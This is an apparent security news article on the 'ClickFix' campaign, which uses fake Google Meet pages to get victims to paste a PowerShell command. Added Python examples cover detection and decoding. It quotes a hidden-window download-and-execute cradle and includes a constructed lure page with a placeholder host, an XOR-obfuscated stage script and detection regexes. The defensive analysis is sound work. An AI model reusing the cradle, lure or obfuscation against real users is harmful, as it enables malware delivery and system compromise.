Weaponized Google Meet Page

A social engineering campaign is using fake Google Meet conference pages to trick users into manually running malicious PowerShell commands, leading to system compromise by remote access trojans and information stealers including AsyncRAT, StealC, and Rhadamanthys.

The technique, known as "ClickFix," is a notable evolution in phishing tactics: it bypasses traditional security controls by exploiting human behavior rather than a technical vulnerability, because the victim, not an exploit, launches the malicious code.

Deceptive Social Engineering Mechanism

Sucuri reports that the attack begins with phishing emails that pose as legitimate Google Meet invitations and direct victims to look-alike URLs such as meet.google.us-join.com and meet.googie.com-join.us (note the extra label appended after "google" and the "i" substituted for "l" in "googie").

When users click these links, they land on a convincing imitation of the Google Meet interface that displays a fake "Microphone Permission Denied" error.

The page uses JavaScript event listeners to mimic legitimate behavior while presenting the victim with a fabricated technical problem that supposedly needs immediate action.

The lure centers on a "Ready to Join?" section that, when the user tries to join, opens a modal dialog claiming "Can't join the meeting."

This modal contains a "Try Fix" button whose click handler calls a copyToClipboard() function, silently placing a malicious PowerShell command on the user's clipboard.

The on-screen instructions then walk the victim through Win+R (which opens the Run dialog), Ctrl+V and Enter. Because the copied text begins with "powershell", the Run dialog launches powershell.exe with the attacker's arguments; the victim never opens a PowerShell window and never sees the command.
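As an added example (this is not code from the Sucuri report or from the malicious page), the following Python scan flags the page-side signature described above: a clipboard write bound to a button, Run-dialog key instructions, and a PowerShell command string embedded in the page. Both HTML samples are constructed for the example and the URL is a placeholder; the second sample shows why a clipboard write or a "permission denied" message on its own is not evidence of anything.

```python
import re
from typing import Optional

# Constructed sample of an injected ClickFix-style page, modelled on the flow described in the
# article (fake "Ready to Join?" section, "Can't join" modal, "Try Fix" button that copies a
# PowerShell one-liner). Not the page Sucuri analysed; the host is a placeholder.
CLICKFIX_HTML = """
<div id="join">Ready to Join?</div>
<div id="modal" style="display:none">
  <p>Can't join the meeting. Microphone Permission Denied.</p>
  <button id="fix">Try Fix</button>
  <ol><li>Press Win+R</li><li>Press Ctrl+V</li><li>Press Enter</li></ol>
</div>
<script>
function copyToClipboard() {
  var t = document.createElement("textarea");
  t.value = "powershell -w 1 iwr hxxp://example.invalid/1/XR.txt -UseBasicParsing|iex";
  document.body.appendChild(t); t.select(); document.execCommand("copy");
}
document.getElementById("fix").addEventListener("click", copyToClipboard);
</script>
"""

# Constructed benign page: a real permission message and a "copy joining info" button, but no
# keyboard instructions and no command string. A naive "clipboard write" rule would flag it.
BENIGN_HTML = """
<p>Microphone permission denied. Allow access in your browser settings to join.</p>
<button id="copy">Copy joining info</button>
<script>
document.getElementById("copy").addEventListener("click", function () {
  navigator.clipboard.writeText("https://meet.google.com/abc-defg-hij");
});
</script>
"""

INDICATORS = {
    "clipboard_write": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I),
    "run_dialog_steps": re.compile(r"\bWin\s*\+\s*R\b", re.I),
    "paste_steps": re.compile(r"\bCtrl\s*\+\s*V\b", re.I),
    "hidden_powershell": re.compile(
        r"powershell(?:\.exe)?\s+-w(?:indowstyle)?\s*(?:1|h|hidden)\b", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b.*?"
        r"\|\s*(?:iex|Invoke-Expression)\b", re.I | re.S),
    "permission_lure": re.compile(
        r"(?:microphone|camera)\s+permission\s+denied|can.?t\s+join\s+the\s+meeting", re.I),
}


def scan_html(html: str) -> dict:
    """Return per-indicator hits and a verdict for one page's HTML."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    # The lure text and a clipboard write each occur on legitimate pages. The ClickFix
    # signature is the combination: clipboard write + instructions that open the Run dialog
    # + a PowerShell command (hidden window or download cradle) sitting in the page source.
    core = (hits["clipboard_write"] and hits["run_dialog_steps"]
            and (hits["hidden_powershell"] or hits["download_cradle"]))
    return {"verdict": "clickfix" if core else "clean", "hits": hits}


COMMAND_RX = re.compile(r"""["'](powershell[^"'\n]*)["']""", re.I)


def extract_command(html: str) -> Optional[str]:
    """Pull the copied command out of its JavaScript string literal so the staging URL and
    file name can be pivoted on without rendering the page."""
    m = COMMAND_RX.search(html)
    return m.group(1) if m else None


if __name__ == "__main__":
    for label, page in (("clickfix", CLICKFIX_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_html(page)["verdict"], extract_command(page))
```

Run this over the files of a site you administer (or over a proxy's HTML captures) rather than on live attacker pages; the point is to catch injected lure pages on your own infrastructure before users reach them.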

The copied PowerShell command typically follows the pattern: powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex. Here -w 1 is the short form of -WindowStyle Hidden, iwr is the alias for Invoke-WebRequest, -UseBasicParsing avoids the Internet Explorer-based HTML parser so the request succeeds on any host, and piping into iex (Invoke-Expression) runs the downloaded text as script without it ever being saved to disk as a file.

According to the report, this command downloads and executes obfuscated scripts hosted on compromised websites, often carrying XOR-encoded malware payloads.
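As an added example (not from the report), here is the detection logic a SOC could run over process-creation telemetry to catch this command line and the aliases PowerShell accepts for the same flags. The three events are constructed Sysmon Event ID 1-style records with placeholder paths and a TEST-NET address; real telemetry carries http://, not the defanged hxxp:// used in the article, so the URL pattern accepts both.

```python
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 field names).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # ClickFix: the victim pasted the one-liner into the Run dialog, so the parent is explorer.exe
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w 1 iwr http://203.0.113.10/1/XR.txt -UseBasicParsing|iex",
    },
    {   # Routine management script launched by an agent: nothing hidden, nothing downloaded
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {   # Admin downloading a file from a console: a cradle, but no in-memory execution
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": 'pwsh -c "Invoke-WebRequest https://files.example.com/tool.zip -OutFile tool.zip"',
    },
]

# Weighted, independent signals. Alternations cover the abbreviations PowerShell's parameter
# binder accepts (-w, -win, -WindowStyle; 1, h, hidden) and the common cradle aliases.
SIGNALS = {
    "hidden_window": (2, re.compile(r"(?:^|\s)-w(?:in(?:dowstyle)?)?\s+(?:1|h(?:idden)?)\b", re.I)),
    "download_cradle": (2, re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b", re.I)),
    "in_memory_exec": (2, re.compile(r"(?:\|\s*|\b)(?:iex|Invoke-Expression)\b", re.I)),
    "basic_parsing": (1, re.compile(r"-UseBasicParsing\b", re.I)),
    "remote_url": (1, re.compile(r"\bh(?:xx|tt)ps?://", re.I)),
}
# explorer.exe is the parent for Run-dialog and Start-menu launches, i.e. a human typed it.
INTERACTIVE_PARENTS = ("explorer.exe",)


def score_event(ev: Dict[str, str]) -> dict:
    """Score one process-creation event; only PowerShell hosts are considered."""
    image = ev.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"score": 0, "reasons": [], "verdict": "ignore"}
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    for name, (weight, rx) in SIGNALS.items():
        if rx.search(cmd):
            score += weight
            reasons.append(name)
    if ev.get("ParentImage", "").lower().endswith(INTERACTIVE_PARENTS):
        score += 2
        reasons.append("interactive_parent")
    # "clickfix" requires the full chain (fetch + execute in memory) plus supporting signals;
    # a lone cradle from a console is worth a look but is not the ClickFix pattern.
    if score >= 6 and "download_cradle" in reasons and "in_memory_exec" in reasons:
        verdict = "clickfix"
    elif score >= 3:
        verdict = "review"
    else:
        verdict = "benign"
    return {"score": score, "reasons": reasons, "verdict": verdict}


def triage(events: List[Dict[str, str]]) -> List[dict]:
    return [score_event(e) for e in events]


if __name__ == "__main__":
    for ev, result in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(result["verdict"], result["score"], result["reasons"], ev["CommandLine"])
```

The parent-process signal is what separates this pattern from scheduled or agent-driven PowerShell: a download cradle piped into Invoke-Expression under explorer.exe means a person typed or pasted it, which is exactly what the lure engineers.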

The downloaded XR.txt file contains heavily obfuscated PowerShell that decodes itself at runtime and executes the next stage directly in memory.

The payload opens with a decoy: a "Verification complete!" message box displayed via [System.Windows.Forms.MessageBox]::Show(), which reassures the victim while the malicious operations continue in the background.

The core functionality uses regex matching and XOR decoding to dynamically reconstruct and execute further commands, which ultimately drop follow-on components such as a batch file named noanti-vm.bat and install Remote Access Trojans (RATs).
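As an added example, and not the real XR.txt, the following Python decoder performs statically what the obfuscated stage does at runtime: it extracts the hex-encoded blob, tries each short string literal in the script as a repeating XOR key, and returns the recovered command instead of executing it. The sample script, its key, variable names and the recovered command are constructed assumptions for the example.

```python
import re
import string


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the symmetric operation the obfuscated stage uses to hide its payload."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Assumed next-stage command and key for the constructed sample (the article names a batch
# file called noanti-vm.bat under %APPDATA%; the exact command line is not in the report).
STAGE3_PLAINTEXT = r'cmd /c "%APPDATA%\noanti-vm.bat"'
_KEY = "q9Zt"


def build_sample_script() -> str:
    """Constructed stage-2 script in the style described: decoy message box, hex blob, short
    key, decode loop, Invoke-Expression of the result."""
    blob = xor_bytes(STAGE3_PLAINTEXT.encode(), _KEY.encode()).hex()
    return "\n".join([
        "Add-Type -AssemblyName System.Windows.Forms",
        '[System.Windows.Forms.MessageBox]::Show("Verification complete!")',
        f'$k = "{_KEY}"',
        f'$h = "{blob}"',
        "$b = for ($i = 0; $i -lt $h.Length; $i += 2) { [Convert]::ToByte($h.Substring($i, 2), 16) }",
        "$d = for ($i = 0; $i -lt $b.Count; $i++) { $b[$i] -bxor [byte][char]$k[$i % $k.Length] }",
        "iex ([Text.Encoding]::ASCII.GetString([byte[]]$d))",
    ])


HEX_BLOB_RX = re.compile(r'"([0-9a-fA-F]{16,})"')   # the encoded payload
STRING_RX = re.compile(r'"([^"]{1,32})"')           # short literals: key candidates
# A correct key yields text; a wrong key almost always produces control bytes.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def decode_stage(script: str) -> dict:
    """Static decode of a script in the sample's shape. The script is never executed."""
    m = HEX_BLOB_RX.search(script)
    if not m:
        return {"found": False}
    data = bytes.fromhex(m.group(1))
    decoy = "MessageBox]::Show" in script
    for cand in STRING_RX.findall(script):
        out = xor_bytes(data, cand.encode())
        if all(c in PRINTABLE for c in out):
            return {"found": True, "key": cand, "command": out.decode("ascii"), "decoy": decoy}
    return {"found": True, "key": None, "command": None, "decoy": decoy}


if __name__ == "__main__":
    sample = build_sample_script()
    print(sample)
    print(decode_stage(sample))
```

Real samples vary the encoding (decimal byte arrays, base64 before the XOR, keys built from arithmetic), so treat the regexes as the part you adapt per sample; the key-candidate-by-printability loop is the reusable idea.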

Variants of the campaign target both Windows and macOS: Windows users receive the StealC and Rhadamanthys stealers, while macOS users are served booby-trapped disk image files carrying the Atomic stealer.

On Windows, the malware establishes persistence by writing files under the $env:AppData directory and creating batch scripts whose commands are heavily obfuscated through environment variable manipulation.

Defense Strategies

This vector is dangerous because it sidesteps browser-level protections such as Google Safe Browsing's download scanning: the browser never downloads a file, so no download warning is shown and no Mark-of-the-Web is applied. The victim types the command, and PowerShell itself fetches and runs the script.

The technique has been attributed to threat groups including TA571, Slavic Nation Empire, and Scamquerteo, with campaigns observed across multiple industries since March 2024.

Organizations must implement security awareness training that emphasizes a simple rule: no legitimate service asks users to press Win+R and paste a command, and no meeting invitation requires running PowerShell.

On the endpoint side, technical defenses should include endpoint detection and response tooling that monitors PowerShell execution (particularly powershell.exe launched from explorer.exe with a hidden window and a download cradle piped into Invoke-Expression), PowerShell script block logging, application control or allowlisting, and DNS or web filtering that blocks known malicious domains such as the look-alike Meet hosts above.

On the website side, where Sucuri observed the payload scripts staged on compromised websites, a web application firewall, regular malware scanning of site files, strong access controls on administrative accounts, and input validation in site code reduce the chance of a legitimate site being turned into a ClickFix staging or landing page.
